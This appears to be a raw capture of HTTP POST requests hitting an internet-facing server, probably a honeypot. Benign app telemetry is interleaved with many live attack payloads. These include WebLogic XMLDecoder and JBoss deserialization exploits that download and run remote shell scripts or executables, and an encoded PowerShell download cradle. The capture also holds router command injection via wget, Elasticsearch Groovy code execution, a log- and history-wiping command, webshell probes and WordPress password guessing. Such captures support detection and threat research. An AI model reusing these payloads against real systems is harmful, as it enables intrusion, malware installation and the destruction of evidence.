User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
566461
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
eb3b322044d603fe5bc6be18194ec292
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
RKUNx9nJbGyJgjFOcs7HMnj04l8+krBHq6LeV7LoMnNis4r+UlDRg4LJzK5vv/3bn03VBW2NRROtpmV2mi82aoG+x96fkJIGdVI5WZ16FM6MRnG3o3CeWG1Vw7Re6rtNEssa0oFXAQDlaQXZf0RiUyvUGUu0xKSh8Sg33GcwGaMbH0wJytcWtzKaIxCJau1v/D+ZrqN3CcFejgIJa3aEYVYlytYkoViM+5gTRFxJQWLAcLy7v2xxIAcftX/NVWaA7krBhaMKBSbKhcEA6rqokIdD0uhp5AzV2hQs1EAhXGe8N4o0EHCllHZXTrbBHb8nYIotbz3V8K9LMUUMFb76MiGxnfRHGYJ28hdm05poILT25v45iyatuMSobw==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache
FKZWyNvAYJmQu7kGPkZXfx2Y4sXvqfXhQHlP7TXKvdygsKdD4F1F/C5bQJ13lgvPTcvA02aCXo//m8LJT0hS3TGuC3jKVV0kLQtSpERSHFWr3W4csLJLAJARspaj52nSLTL/Xv/w5uPhXwpyD6LevY8PctzK5rcE5WzyTdpcQAmXEO0cIdegNNgVFt2dG2hNncmfKQevfl+luiGAY2R+Sk5yppT4N88BxD3yBfogovqZWlfN6pPjHFzpHqBbay81S1dnNk4yAelw0Zj9XDc3Th0DDwZ+UX+7EgmYPKQmM8QLwFbWZ/xCCCf5sM+Mj57DtnGrSSak80J+EF6C3bFVVrgv8vcZT2ONjuEFDcS6fcAAticrXLpiqWzfoA+jMNPWLma+0Be6+mjqbsRtD68JgeMA7Mh7/4ylaztGeFzSVNM0jQ03HBV+eeI=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅWï◊lÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache
QfZdlNydbDv/zkUHRNi8uHXCk5Nh9Mg467GyaTIQVa/k3/lIcVDsXwe/PsoWY0jEuuJi+bqDajZFKIfVus90+C7noYnfP6BeE68rDe72rwPxNtGEpS/Do7zuTlMT2kVN3aGKFShBTePWkqHKk1xSM0LeIpa1CYv7qk/9oN4lFJkwukCGsshrOlbTQrcb4TrT92275CoqRD5+Re3X8v/kWuQ2VZl/hyrKq7MlQQ39x4qZe4/4ZplHgwlWzoGUXdG1zdfQABFlsX8bbtqX+mhxmmwbPuk3ebLIdbPtgGhnOEYNp9/hBbgLYjRYAZ8GfRjB9UAFkuxUX0M6NiqqvnkzjfNhnbGOiU4lGS++9SemmaaPXxizraJPW+NzQGYchJeLqePsi1TjTW5v72Sa/gPuKreDFyBVDJLoKrquc4ds9l3yOWem7NX3Jzh1xGQi
POST http://check.proxyradar.com/azenv.php?auth=149365060359&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
QqVfxo+Zbc7sSyJiShpbSVH6fDyySdoBhLjH96BjvUP+63Vo6drUw1ymtPwu4h7SbVrCmmodOdvfei/wREqwGyi45KwTaA1NUPICw6qaAn/U74IKYIULs6t5NlfU4Atp56vpeY3IqJM9TCUCS3BQ+k97R5eqF72CAtNV7Fy8Ky8WJ6wAruSax9/+Zw15OfVLevwMrpwNBhVMldUW7GIwEiV2rG1MoNrKJU7kWy3EoyQKHCbWizVOi1+p7dnOLZtaW68VRO393zsWUDFrL/9694dBCdtP3DQVca/bf747nu/BG2NbEhIHAsSAGhjDUWPmUIRYAr9LYc2SXuv4yN4lkpecZ9DAdiSP08jV/UOzZY9S7pQKpXbtaDsWRcAXCxcLQxV/PCqHOAAoCzYXEfep8Aw4
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149453920177&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://check.best-proxies.ru/azenv.php?auth=146130369815649&a=PC&i=1760126605&p=1080 HTTP/1.1
Cookie: testCookie=true
Host: check.best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue!@#
POST /cgi?2 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 128.199.238.30/mainFrame.htm
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=1
host=127.0.0.1;cd /tmp ; wget http://domstates.su/archi.txt;
X_TP_ConnName=ewan_ipoe_s
diagnosticsState=Requested
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å…ùƒ4Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue123
POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
423701
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
eb481ae7fb1f61ed4f38db475644465f
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST /_search HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"msf_result":{"script":"java.lang.Math.class.forName(\"java.lang.Runtime\")","lang":"groovy"}}}
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=11111111
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂ØmÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache
RaVXk9/LYbd4CXoOW9rSkqDXc49Y+P9CkyHuCKc4AbiXZ7wdopnYkKdVeakPj5zkK/uRPziQJKjOTlYTIO8DEnC+IIBmh5Vhf8ZVYO3Hhf6ahN2Gr34JI8Ago/vtwa9ovZ5c9BHf45v0ocMXp2B8/RSGV+HZGSZ3/jJWq/2hZMH39sJ5dLp+q42Sp9Qlh9Vn8B7d0mYThfMwTD3YQpBlVZGO5kQsQEz++5/AkmM4U54SwyJdjW/jxL/TBi8IqaB1emI9Mcer4yd/yqdFHMHjRizMulGbkPNM1f/S2qAm0iRJDEySUgORLswqHSxi4XG92ivK9OrCdtMIvEOMn8Mfp8m6vFP4+PJ9KpR9Ioy8TMfrCnRNIB1bTtgQGeM9cPU2Z3rQBsZEG/kgQLJmpWttjVvmS38ovHtGaj2TmScNv6m6
POST http://t5.proxy-checks.com/favicon.ico HTTP/1.1
Host: t5.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /sdk HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Host: x.x.x.x:8080
Content-Length: 441
Connection: close
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=123!@#
POST http://check.proxyradar.com/azenv.php?auth=147369633295&a=PSCMN&i=2733905975&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂0B÷Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /invoker/readonly HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1625
Host: x.x.x.x:80
User-Agent: Python-urllib/1.17
¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•L memberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}
java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyîLfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±îL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;L iMethodNametLjava/lang/String;[ iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~uq~ur[Ljava.lang.String;≠“VÁÈ{Gxpt /bin/basht-ctpython -c "import base64;exec(base64.b64decode('aW1wb3J0IGJhc2U2NCx1cmxsaWIKZm9yIGkgaW4gcmFuZ2UoNSk6CiAgICB0cnk6CiAgICAgICAgZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCdodHRwOi8vay56c3c4LmNjL0FwaS8nKS5yZWFkKCkpKQogICAgICAgIGJyZWFrCiAgICBleGNlcHQ6CiAgICAgICAgcGFzcw=='))"texecuq~vq~/srjava.util.HashMap⁄¡√`—F
loadFactorI thresholdxp?@wxxvrjava.lang.annotation.Retentionxpq~:
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST http://d.applovin.com/device?device_token=MaznYs97JTiqaqEwnZGZ5hoNAbGKHRajj5FMcZF_ODHYTEi_kuVCQ4yNWoT9kVKCYOdmiOu8EBuDlBzDf9dDAcksZAxPMlyVV-CvlM0u7mEUGLyh8g8trSy-C2iSYtXpQsCRhRgeTqA7eY2q-c8xqFHgtRJiJ0jgDFMg8-H0uSU= HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 970
{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":190,"SubmitData_time":505331,"FetchNextAd_time":2935170,"RepeatSubmitData_time":380819,"RenderAd_time":1611115,"TaskDispatchPostback_time":380919,"ad_session_start":1496230017843,"FetchNextAd_count":188,"RepeatFetchNextAd_time":646724,"cached_files_expired":66,"RepeatFetchNextAd_count":25,"RepeatSubmitData_count":21,"TaskDispatchPostback_count":40,"TaskCollectAdvertisingId_time":21556,"RenderAd_count":73,"SubmitData_count":36,"TaskCollectAdvertisingId_count":40}}
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
